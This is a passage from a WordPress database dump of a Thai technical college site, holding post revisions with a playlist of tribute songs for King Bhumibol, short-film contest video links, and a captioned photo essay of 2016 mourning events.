(4520, 3, '2018-11-15 10:29:50', '2018-11-15 03:29:50', '[embed]https://youtu.be/4C77KiTi1ag[/embed]\r\n<h3><em><span style=\"color: #993300;\">Play Lists</span></em></h3>\r\n<ol>\r\n <li>13ตุลา-หนุ่ย <em><span style=\"color: #ff0000;\">00:01</span></em></li>\r\n <li>Airborne - บทเพลงถึงพ่อ <em><span style=\"color: #ff0000;\">04:11</span></em></li>\r\n <li>black sheep-lecture building <em><span style=\"color: #ff0000;\">08:32</span></em></li>\r\n <li>Blossoms Blooming-Secret Sessions <span style=\"color: #ff0000;\"><em>10:46</em></span></li>\r\n <li>inner happiness-mama say yes <em><span style=\"color: #ff0000;\">17:54</span></em></li>\r\n <li>Long live in my heart - Deep O Seas <em><span style=\"color: #ff0000;\">20:41</span></em></li>\r\n <li>OH Pra Keun Srung -Kru Pum Final <em><span style=\"color: #ff0000;\">25:25</span></em></li>\r\n <li>Rapbit Dolls - นักวิทยาศาสตร์โลกล้านปี <em><span style=\"color: #ff0000;\">29:26</span></em></li>\r\n <li>Run - My Daddy is BEST ft. p-hot <em><span style=\"color: #ff0000;\">34:11</span></em></li>\r\n <li>Time will tell - หัวใจพ่อ<em><span style=\"color: #ff0000;\"> 37:57</span></em></li>\r\n <li>walk like dad-Stereogram <em><span style=\"color: #ff0000;\">42:45</span></em></li>\r\n <li>Yellow Duck! - Paul <em><span style=\"color: #ff0000;\">46:06</span></em></li>\r\n <li>ขอให้พ่อได้คลายกังวล-white whisky <em><span style=\"color: #ff0000;\">48:30</span></em></li>\r\n <li>คำของพ่อ<em><span style=\"color: #ff0000;\"> 53:55</span></em></li>\r\n <li>คำ\'ฉันรักพ่อ\' เอ้-วรวัฒน์ ศรีจรัส<em><span style=\"color: #ff0000;\"> 57:39</span></em></li>\r\n <li>คำสอนจากพ่อ-หนึ่ง ตีสิบ <em><span style=\"color: #ff0000;\">01:02:45</span></em></li>\r\n <li>คิดถึงพ่อ ขอทำดี-แมน ฐนพล จำปาไทย <em><span style=\"color: #ff0000;\">01:07:40</span></em></li>\r\n <li>คิดถึงพ่อ-Bluedock Final <em><span style=\"color: #ff0000;\">01:12:08</span></em></li>\r\n <li>จงเป็นหนึ่งเดียว<em><span style=\"color: #ff0000;\"> 01:15:41</span></em></li>\r\n <li>จากใต้ฝ่าละอองธุลี - พงษ์ บาติก <em><span style=\"color: #ff0000;\">01:18:13</span></em></li>\r\n <li>ใจบริสุทธิ์-Never mind <em><span style=\"color: #ff0000;\">01:22:16</span></em></li>\r\n <li>แด่รัชกาลที่ ๙ - MYDAY <em><span style=\"color: #ff0000;\">01:26:11</span></em></li>\r\n <li>ตามรอยคำพ่อสอน-AUTOPiLOT Ft.ป้อง สราวุธ <em><span style=\"color: #ff0000;\">01:30:13</span></em></li>\r\n <li>ท่านที่เรารัก-สารฑูร กฤตติกากุล <em><span style=\"color: #ff0000;\">1:36:06</span></em></li>\r\n <li>เทคโนโลดี-BAY BAY BROTHERS Feat. Sci-fi barber<em><span style=\"color: #ff0000;\"> 01:42:52</span></em></li>\r\n <li>แทนคุณแผ่นดิน-นักดนตรีมุมตึก <em><span style=\"color: #ff0000;\">01:46:51</span></em></li>\r\n <li>ไทใหญ่รักในหลวง-กลุ่มเยาวชนไทใหญ่ <em><span style=\"color: #ff0000;\">01:49:52</span></em></li>\r\n <li>ปฏิญาณ-Weekend Rocker <em><span style=\"color: #ff0000;\">01:53:32</span></em></li>\r\n <li>ปณิธานของลูก-ทีมงานเดอะเพ้อเจอร์ <em><span style=\"color: #ff0000;\">01:57:56</span></em></li>\r\n <li>ฝันบิดา-ชาติ สุชาติ <em><span style=\"color: #ff0000;\">02:04:10</span></em></li>\r\n <li>ฝึกใจ(Song - for king)-The Catwalk <em><span style=\"color: #ff0000;\">02:08:55</span></em></li>\r\n <li>พ่อบนฟ้า-เดอะ คุโรบูตะ <em><span style=\"color: #ff0000;\">02:13:20</span></em></li>\r\n <li>พ่อผู้มีแต่ให้-(รวมนักดนตรีนวนคร) <em><span style=\"color: #ff0000;\">02:15:40</span></em></li>\r\n <li>พอมีพอกิน-Kee Khumsaeng <em><span style=\"color: #ff0000;\">02:21:01</span></em></li>\r\n <li>พ่อหลวงของปวงชนฯ-เฟรนด์อาบี <em><span style=\"color: #ff0000;\">02:25:06</span></em></li>\r\n <li>พ่อหลวงในดวงใจ....นิรันดร์-ฟอร์ด สบชัย ไกรยูรเสน <em><span style=\"color: #ff0000;\">02:30:13</span></em></li>\r\n <li>พ่อแห่งแผ่นดิน-จิระยุทธ จิระธนวิทย์ <em><span style=\"color: #ff0000;\">02:36:09</span></em></li>\r\n <li>เพลง13ตุลา2559 ใจแตกสลาย ขอเป็นข้ารองพระบาททุกชาติไป-สาธิต จ้อยเจริญ <em><span style=\"color: #ff0000;\">02:41:02</span></em></li>\r\n <li>เพลงของพ่อ-วรัตถ์ชัย <em><span style=\"color: #ff0000;\">02:45:56</span></em></li>\r\n <li>เพลงคือราชา พงษ์ บาติก <em><span style=\"color: #ff0000;\">02:51:03</span></em></li>\r\n <li>ภาพที่เคยมีพ่อ-รวมศิลปินดงงู <em><span style=\"color: #ff0000;\">02:54:53</span></em></li>\r\n <li>ภาพในหัวใจ - รวมศิลปิน <em><span style=\"color: #ff0000;\">02:58:51</span></em></li>\r\n <li>มองฟ้าเวลาคิดถึง-100วันแห่งความคิดถึง Kpn Sarincity Samutsakhon <em><span style=\"color: #ff0000;\">03:04:12</span></em></li>\r\n <li>มิใช่อ่อนแออ-สมัยไหนนิยม <em><span style=\"color: #ff0000;\">03:08:01</span></em></li>\r\n <li>เมื่อพ่อกลับไปบนฟ้า<em><span style=\"color: #ff0000;\"> 03:12:20</span></em></li>\r\n <li>ยาวิเศษจากฟ้า-Recordng studo by Sabudchai Studio <em><span style=\"color: #ff0000;\">03:15:59</span></em></li>\r\n <li>รอยเท้า ที่พ่อเดิน-พลายงาม<span style=\"color: #ff0000;\"><em> 03:19:26</em></span></li>\r\n <li>รอยเท้าพ่อ-ใบไม้สีแดง <span style=\"color: #ff0000;\"><em>03:23:45</em></span></li>\r\n <li>ระหว่างทาง -Black Tree <em><span style=\"color: #ff0000;\">03:27:17</span></em></li>\r\n <li>รักพ่อ - BAD DNA <em><span style=\"color: #ff0000;\">03:32:18</span></em></li>\r\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง - Live and Learn<em><span style=\"color: #ff0000;\"> 03:35:47</span></em></li>\r\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง - รักพ่อต้องรักกัน <span style=\"color: #ff0000;\"><em>03:39:18</em></span></li>\r\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง - ศรัทธา <em><span style=\"color: #ff0000;\">03:43:19</span></em></li>\r\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง[เพลงพระราชนิพนธ์] - ชะตาชีวิต <em><span style=\"color: #ff0000;\">03:47:33</span></em></li>\r\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง[เพลงพระราชนิพนธ์] - บัวขาว <em><span style=\"color: #ff0000;\">03:49:59</span></em></li>\r\n <li>เรือนจำพิเศษมีนบุรีประสายเสียง[เพลงพระราชนิพนธ์] - สายฝน <em><span style=\"color: #ff0000;\">03:53:55</span></em></li>\r\n <li>ศรัทธา-Past of the pain <em><span style=\"color: #ff0000;\">03:56:52</span></em></li>\r\n <li>สมัยไหนนิยม เพลง มิใช่อ่อนแอ <em><span style=\"color: #ff0000;\">04:03:32</span></em></li>\r\n <li>สัตว์ป่า - BABYLON BK <em><span style=\"color: #ff0000;\">04:07:50</span></em></li>\r\n <li>สิงโต นำโชค - รักเพื่อพ่อ <em><span style=\"color: #ff0000;\">04:09:39</span></em></li>\r\n <li>สุดท้ายคือรางวัล จากผ่านภพ-เฉลิมบัวทิพย์ ไทยเเลน์กอต <em><span style=\"color: #ff0000;\">04:12:52</span></em></li>\r\n <li>หน้าที่ของตน-หนึ่ง smile buffalo <em><span style=\"color: #ff0000;\">04:15:34</span></em></li>\r\n <li>ห่างไกล ใจยังห่วง-CobraK <em><span style=\"color: #ff0000;\">04:20:07</span></em></li>\r\n <li>ให้คงอยู่-Sao Moonlight Gypsy <em><span style=\"color: #ff0000;\">04:22:13</span></em></li>\r\n <li>อยากให้พ่อกลับมา-นายเสียง ประตูเปิด <em><span style=\"color: #ff0000;\">04:25:57</span></em></li>\r\n <li>โอ้พระคืนสรวง [Rock Version] - แตงโม Lost Ferrari <em><span style=\"color: #ff0000;\">04:29:55</span></em></li>\r\n <li>โอ้พระคืนสรวง-CU Chorus <em><span style=\"color: #ff0000;\">04:33:32</span></em></li>\r\n</ol>', '\"แต่งเพลงเพื่อพ่อ\"', '', 'inherit', 'closed', 'closed', '', '4473-revision-v1', '', '', '2018-11-15 10:29:50', '2018-11-15 03:29:50', '', 4473, 'http://www.technicrayong.ac.th/4473-revision-v1/', 0, 'revision', '', 0),
(4521, 3, '2018-11-15 10:48:13', '2018-11-15 03:48:13', 'https://youtu.be/GwqyX1Gk5N0\r\n\r\nhttps://youtu.be/T10s06PGMHI\r\n\r\nhttps://youtu.be/ckSfZebcsik\r\n\r\nhttps://youtu.be/E74lDuIBBQA\r\n\r\n \r\n\r\n ', 'ประกวดหนังสั้น \"อาชีวะทำดีเพื่อพ่อ\"', '', 'inherit', 'closed', 'closed', '', '4478-revision-v1', '', '', '2018-11-15 10:48:13', '2018-11-15 03:48:13', '', 4478, 'http://www.technicrayong.ac.th/4478-revision-v1/', 0, 'revision', '', 0),
(4522, 3, '2018-11-15 10:55:03', '2018-11-15 03:55:03', 'https://youtu.be/xrNi-56jrzQ\n\nhttps://www.youtube.com/watch?v=QO9X6zaqiWA\n<h2><span style=\"color: #993300;\"><strong>เชิญชมภาพถ่าย คลิก Link ด้านล่าง</strong></span></h2>\n<h3><span style=\"color: #003300;\"><a style=\"color: #003300;\" href=\"/ภาพถ่าย-โดย-อรุณ-ร้อยศรี\">ภาพถ่าย โดย อรุณ ร้อยศรี</a></span></h3>\n<h3><a href=\"/ภาพถ่าย-โดย-บัณฑิต-โชติส\"><span style=\"color: #003300;\">ภาพถ่าย โดย บัณฑิต โชติสุวรรณ</span></a></h3>\n<h3><span style=\"color: #003300;\">ภาพถ่าย โดย จันทร์กลาง กันทอง</span></h3>\n<h3><span style=\"color: #003300;\">ภาพถ่าย โดย เริงชัย คงเมือง</span></h3>\n<h3><span style=\"color: #003300;\">ภาพถ่าย โดย เริงฤทธิ์ คงเมือง</span></h3>', '๑๐๐ วัน เปลี่ยนความโทมนัสเป็นพลัง', '', 'inherit', 'closed', 'closed', '', '3805-autosave-v1', '', '', '2018-11-15 10:55:03', '2018-11-15 03:55:03', '', 3805, 'http://www.technicrayong.ac.th/3805-autosave-v1/', 0, 'revision', '', 0),
(4523, 3, '2018-11-15 13:54:18', '2018-11-15 06:54:18', '<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">ภายในพิธีสวดเจริญพระพุทธมนต์เจริญชัยมงคลคาถา</span></h3>\n<img class=\"aligncenter size-large wp-image-4485\" src=\"/wp-content/uploads/2018/11/5-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\n<p style=\"text-align: center;\"> ถวายพระพรสมเด็จพระบรมโอรสาธิราช เจ้าฟ้ามหาวชิราลงกรณ สยามกุฎราชกุมาร ขึ้นทรงราชย์สืบราชสันตติวงศ์เป็นพระมหากษัตริย์ รัชกาลที่ ๑๐ วันที่ ๑ ธันวาคม พ.ศ. ๒๕๕๙ ณ วัดบวรนิเวศวิหารที่พระองค์เสด็จประทับเมื่อทรงผนวช เมื่อปี พ.ศ. 2512</p>\n\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ดาโต๊ะ ดร.เฟาซัน หลังปูเต๊ะ และพี่น้องมุสลิม\"</span></h3>\n<img class=\"aligncenter size-large wp-image-4486\" src=\"/wp-content/uploads/2018/11/11-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\n<p style=\"text-align: center;\">“ชุมชนมัสยิดต้นสน” ร่วมกันทําพิธีสวดดุอาอ์ถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ชุมชนมุสลิมเก่าแก่ย่านบางกอกใหญ่แห่งนี้ครั้งหนึ่งกษัตริย์สองพี่น้อง ในหลวงรัชกาลที่ 8 และในหลวงรัชกาลที่ 9 เคยเสด็จเยี่ยมเป็นการส่วนพระองค์</p>\n<img class=\"aligncenter size-large wp-image-4487\" src=\"/wp-content/uploads/2018/11/14-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\n<p style=\"text-align: center;\">พ่อค้าแม่ค้าชุมชนชาวปากคลองตลาด ร่วมกันจัดซุ้มดอกไม้และจุดเทียนน้อมถวายอาลัยในวันที่ 5 ธันวาคม พ.ศ. ๒๕๕๙ ซึ่งเป็นวันคล้ายวันพระราชสมภพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณริมทางเท้า ปากคลองตลาด กรุงเทพฯ</p>\n\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">นักศึกษาภาควิชาวิจิตรศิลป์ คณะสถาปัตยกรรมศาสตร์</span></h3>\n<img class=\"aligncenter size-large wp-image-4488\" src=\"/wp-content/uploads/2018/11/18-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\n<p style=\"text-align: center;\">สถาบันเทคโนโลยีพระจอมเกล้าเจ้าคุณทหารลาดกระบัง ร่วมกันวาดพระบรมสาทิสลักษณ์ของในหลวงรัชกาลที่ 9 พร้อมน้อมนําพระราชดํารัส “เสียใจได้ แต่อย่าละเลยหน้าที่” มาเขียนประกอบภาพวาดด้วย</p>\n\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">มูลนิธิพระคชบาล ได้นําช้าง 11 เชือก จากวังช้างอยุธยา</span></h3>\n<img class=\"aligncenter size-large wp-image-4490\" src=\"/wp-content/uploads/2018/11/19-Chanklang-Kanthong-copy-1024x581.jpg\" alt=\"\" width=\"640\" height=\"363\" />\n<p style=\"text-align: center;\">พร้อมด้วยควาญช้างกลุ่มคชสารราว 200 คน เดินทางไปถวายความอาลัย และสักการะพระบรมศพ พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณหน้าประตูมณีนพรัตน์ พระบรมมหาราชวัง</p>\n\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“มอเตอร์ไซค์จิตอาสา”</span></h3>\n<img class=\"aligncenter size-large wp-image-4491\" src=\"/wp-content/uploads/2018/11/22-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\n<p style=\"text-align: center;\">มอเตอร์ไซค์จิตอาสาให้บริการรับ-ส่งฟรี สําหรับประชาชนที่เดินทางมาถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ณ บริเวณโดยรอบสนามหลวง “ตั้งใจจะมาจนกว่าจะเสร็จพระราชพิธีถวายพระเพลิงพระบรมศพเลยครับ” จิตอาสารายหนึ่งกล่าว</p>\n\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“จุฬาฯ เทิด ธ พระภูมิพล”</span></h3>\n<img class=\"aligncenter size-large wp-image-4492\" src=\"/wp-content/uploads/2018/11/25-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\n<p style=\"text-align: center;\">แพทย์ พยาบาล และบุคลากรจากคณะแพทยศาสตร์ จุฬาลงกรณ์มหาวิทยาลัยและโรงพยาบาลจุฬาลงกรณ์ จุดเทียนถวายอาลัยแด่ในหลวงรัชกาลที่ 9</p>\n<img class=\"aligncenter size-large wp-image-4493\" src=\"/wp-content/uploads/2018/11/31-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\n<p style=\"text-align: center;\">นางไพเราะ เยอเบาะ หญิงชาวอาข่า หนึ่งใน 999 คน จาก 9 ชนเผ่าที่สูงที่เข้าถวายสักการะพระบรมศพ ณ พระที่นั่งดุสิตมหาปราสาท ได้โชว์เหรียญพระราชทานเพื่อใช้แทนบัตรประชาชนในอดีต จากในหลวงรัชกาลที่ 9</p>\n\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">เจ้าหน้าที่พยาบาลพยุงนักเรียนพยาบาลที่มาร่วมงาน “จุฬาฯ เทิด ธ พระภูมิพล”</span></h3>\n<img class=\"aligncenter size-large wp-image-4494\" src=\"/wp-content/uploads/2018/11/33-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\n<p style=\"text-align: center;\">จัดขึ้นโดย โรงพยาบาลจุฬาลงกรณ์ สภากาชาดไทย ร่วมกับคณะแพทยศาสตร์ จุฬาลงกรณ์มหาวิทยาลัย เพื่อรําลึกถึงพระมหากรุณาธิคุณพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ ลานหน้าพระบรมราชานุสาวรีย์ รัชกาลที่ ๖ สวนลุมพินี</p>\n\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ทําดีเพื่อพ่อ”</span></h3>\n<img class=\"aligncenter size-large wp-image-4495\" src=\"/wp-content/uploads/2018/11/40-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">ธวิน ปินะถา หรือ “เพ็ชรน้อยหัวใจเพชร”</span></h3>\n<img class=\"aligncenter size-large wp-image-4496\" src=\"/wp-content/uploads/2018/11/46-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\n<p style=\"text-align: center;\">ชายหนุ่มขาพิการทั้งสองข้าง เดินทางจากบ้านเกิดในจังหวัดมหาสารคามมายังพระบรมมหาราชวังด้วยความมุ่งมั่นอุตสาหะเป็นระยะทางกว่า 500 กิโลเมตร ด้วยจักรยานคู่ชีพที่ประกอบขึ้นเอง เพื่อมาสักการะพระบรมศพ</p>\n\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“บนเส้นทาง คําสอนของพ่อ 70 ปี ที่ครองราชย์”</span></h3>\n<img class=\"aligncenter size-large wp-image-4497\" src=\"/wp-content/uploads/2018/11/47-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\n\n<img class=\"aligncenter size-large wp-image-4498\" src=\"/wp-content/uploads/2018/11/48-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\n<p style=\"text-align: center;\">ประชาชนต่างพากันเข้าไปสัมผัสเปลือกไม้จันทน์หอม แล้วนํามาแตะหน้าผากของตนเพื่อความเป็นสิริมงคล ขณะเข้าร่วมพิธีบวงสรวงตัดไม้จันทน์หอม 12 ต้น ที่ยืนต้นตายธรรมชาติในพื้นที่อุทยานแห่งชาติกุยบุรี จังหวัดประจวบคีรีขันธ์เพื่อนํามาจัดสร้างพระโกศทรงพระบรมศพเหนือพระจิตกาธานบนพระเมรุมาศ ในงานพระราชพิธีถวายพระเพลิงพระบรมศพ พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\n\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">ประชาชนร่วมจุดเทียนแสดงความอาลัย ณ โรงพยาบาลศิริราช</span></h3>\n<img class=\"aligncenter size-large wp-image-4499\" src=\"/wp-content/uploads/2018/11/61-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\n<p style=\"text-align: center;\">เพื่อถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช เสด็จสวรรคตครบ 1 เดือน</p>\n<img class=\"aligncenter size-large wp-image-4500\" src=\"/wp-content/uploads/2018/11/82-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\n<p style=\"text-align: center;\">พ่อค้าแม่ค้าชุมชนชาวปากคลองตลาด ร่วมกันจัดซุ้มดอกไม้ และจุดเทียนน้อมถวายความอาลัยในวันที่ 5 ธันวาคม พ.ศ. 2559 ซึ่งเป็นวันคล้ายวันพระราชสมภพของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณริมทางเท้า ปากคลองตลาด กรุงเทพมหานคร</p>\n<img class=\"aligncenter size-large wp-image-4501\" src=\"/wp-content/uploads/2018/11/83-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\n<p style=\"text-align: center;\">เจ้าหน้าที่วัดบวรนิเวศวิหาร ลั่นฆ้องตีกลองก่อนที่พระภิกษุจะประกอบพิธีสวดเจริญพระพุทธมนต์ เจริญชัยมงคลคาถา ถวายพระพรสมเด็จพระบรมโอรสาธิราช เจ้าฟ้ามหาวชิราลงกรณ สยามมกุฎราชกุมาร ขึ้นทรงราชย์สืบราชสันตติวงศ์เป็ นพระมหากษัตริย์รัชกาลที่ ๑๐ วันที่ ๑ ธันวาคม พ.ศ. ๒๕๕๙</p>\n\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">ข้าราชการ ประชาชน และนักเรียนนักศึกษาต่างรวมตัวกัน</span></h3>\n<img class=\"aligncenter size-large wp-image-4502\" src=\"/wp-content/uploads/2018/11/84-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\n<p style=\"text-align: center;\">เป็นจิตอาสา เพื่อร่วมทําความดีถวายเป็นพระราชกุศลแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ในภาพเป็นการให้บริการตัดผมฟรีที่บริเวณสนามหลวง</p>\n\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">พิพิธภัณฑ์รถโบราณ “เจษฎาเทคนิคมิวเซียม”</span></h3>\n<img class=\"aligncenter size-large wp-image-4503\" src=\"/wp-content/uploads/2018/11/85-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\n<p style=\"text-align: center;\">นํารถโบราณมารับส่งประชาชนในเส้นทางรอบสนามหลวงโดยไม่คิดค่าบริการ เพื่อร่วมทําความดีถวาย แด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\n\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“รวมใจอาสา ทําดีเพื่อพ่อ”</span></h3>\n<img class=\"aligncenter size-large wp-image-4504\" src=\"/wp-content/uploads/2018/11/86-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\n\n<img class=\"aligncenter size-large wp-image-4505\" src=\"/wp-content/uploads/2018/11/88-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\n<p style=\"text-align: center;\">ร้านขายเสื้อผ้าเกือบทุกร้านในย่านบางลําพู นําเสื้อผ้าสีดําและสีขาวมาวางจําหน่าย</p>\n<img class=\"aligncenter size-large wp-image-4506\" src=\"/wp-content/uploads/2018/11/89-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\n<p style=\"text-align: center;\">ชายเจ้าของร้านค้าแห่งหนึ่งในบริเวณแยกสะพานเฉลิมวันชาติ เขตพระนคร นําพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 10 ออกมาตั้งหน้าร้าน เช่นเดียวกับร้านค้าอีกหลายแห่งในย่านนี้ที่จําหน่ายสินค้าซึ่งเกี่ยวข้องกับสถาบันพระมหากษัตริย์ เช่น ธงชาติ ธงเฉลิมพระเกียรติ ภาพของพระบรมวงศานุวงศ์ที่เริ่มนําพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 10 ออกมาตั้งโชว์และจําหน่ายมากขึ้น</p>\n\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“วันที่ 100”</span></h3>\n<img class=\"aligncenter size-large wp-image-4507\" src=\"/wp-content/uploads/2018/11/90-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\n\n<img class=\"aligncenter size-large wp-image-4508\" src=\"/wp-content/uploads/2018/11/94-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\n<p style=\"text-align: center;\">พนักงานต้อนรับหญิงในสถานบันเทิงย่านอโศกหรือที่รู้จักกันว่า “ซอยคาวบอย” ร่วมใจกันสวมชุดสีดํา เช่นเดียวกับร้านต่าง ๆ ที่ลดป้ายแสงสีลงเพื่อเป็นการถวายความไว้อาลัยแด่ในหลวงรัชกาลที่ 9 เป็นระยะเวลา 1 เดือน</p>\n<img class=\"aligncenter size-large wp-image-4509\" src=\"/wp-content/uploads/2018/11/98-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\n\n<img class=\"aligncenter size-large wp-image-4510\" src=\"/wp-content/uploads/2018/11/99-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\n\n \n\n ', 'ภาพถ่าย โดย จันทร์กลาง กันทอง', '', 'inherit', 'closed', 'closed', '', '4482-autosave-v1', '', '', '2018-11-15 13:54:18', '2018-11-15 06:54:18', '', 4482, 'http://www.technicrayong.ac.th/4482-autosave-v1/', 0, 'revision', '', 0),
(4524, 3, '2018-11-15 12:21:03', '2018-11-15 05:21:03', 'https://youtu.be/GwqyX1Gk5N0\r\n\r\nhttps://youtu.be/T10s06PGMHI\r\n\r\nhttps://youtu.be/ckSfZebcsik\r\n\r\nhttps://youtu.be/E74lDuIBBQA\r\n\r\nhttps://youtu.be/4KA6AsI33Z0\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ประกวดหนังสั้น \"อาชีวะทำดีเพื่อพ่อ\"', '', 'inherit', 'closed', 'closed', '', '4478-revision-v1', '', '', '2018-11-15 12:21:03', '2018-11-15 05:21:03', '', 4478, 'http://www.technicrayong.ac.th/4478-revision-v1/', 0, 'revision', '', 0),
(4525, 3, '2018-11-15 12:24:23', '2018-11-15 05:24:23', '<img class=\"aligncenter size-large wp-image-4485\" src=\"/wp-content/uploads/2018/11/5-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ภายในพิธีสวดเจริญพระพุทธมนต์เจริญชัยมงคลคาถา ถวายพระพรสมเด็จพระบรมโอรสาธิราช เจ้าฟ้ามหาวชิราลงกรณ สยามกุฎราชกุมาร ขึ้นทรงราชย์สืบราชสันตติวงศ์เป็นพระมหากษัตริย์ รัชกาลที่ ๑๐ วันที่ ๑ ธันวาคม พ.ศ. ๒๕๕๙ ณ วัดบวรนิเวศวิหารที่พระองค์เสด็จประทับเมื่อทรงผนวช เมื่อปี พ.ศ. 2512</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ดาโต๊ะ ดร.เฟาซัน หลังปูเต๊ะ และพี่น้องมุสลิม\"</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4486\" src=\"/wp-content/uploads/2018/11/11-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">“ชุมชนมัสยิดต้นสน” ร่วมกันทําพิธีสวดดุอาอ์ถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ชุมชนมุสลิมเก่าแก่ย่านบางกอกใหญ่แห่งนี้ครั้งหนึ่งกษัตริย์สองพี่น้อง ในหลวงรัชกาลที่ 8 และในหลวงรัชกาลที่ 9 เคยเสด็จเยี่ยมเป็นการส่วนพระองค์</p>\r\n ', 'ภาพถ่าย โดย จันทร์กลาง กันทอง', '', 'inherit', 'closed', 'closed', '', '4482-revision-v1', '', '', '2018-11-15 12:24:23', '2018-11-15 05:24:23', '', 4482, 'http://www.technicrayong.ac.th/4482-revision-v1/', 0, 'revision', '', 0),
(4526, 3, '2018-11-15 13:27:36', '2018-11-15 06:27:36', '<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">ภายในพิธีสวดเจริญพระพุทธมนต์เจริญชัยมงคลคาถา</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4485\" src=\"/wp-content/uploads/2018/11/5-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\"> ถวายพระพรสมเด็จพระบรมโอรสาธิราช เจ้าฟ้ามหาวชิราลงกรณ สยามกุฎราชกุมาร ขึ้นทรงราชย์สืบราชสันตติวงศ์เป็นพระมหากษัตริย์ รัชกาลที่ ๑๐ วันที่ ๑ ธันวาคม พ.ศ. ๒๕๕๙ ณ วัดบวรนิเวศวิหารที่พระองค์เสด็จประทับเมื่อทรงผนวช เมื่อปี พ.ศ. 2512</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ดาโต๊ะ ดร.เฟาซัน หลังปูเต๊ะ และพี่น้องมุสลิม\"</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4486\" src=\"/wp-content/uploads/2018/11/11-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">“ชุมชนมัสยิดต้นสน” ร่วมกันทําพิธีสวดดุอาอ์ถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ชุมชนมุสลิมเก่าแก่ย่านบางกอกใหญ่แห่งนี้ครั้งหนึ่งกษัตริย์สองพี่น้อง 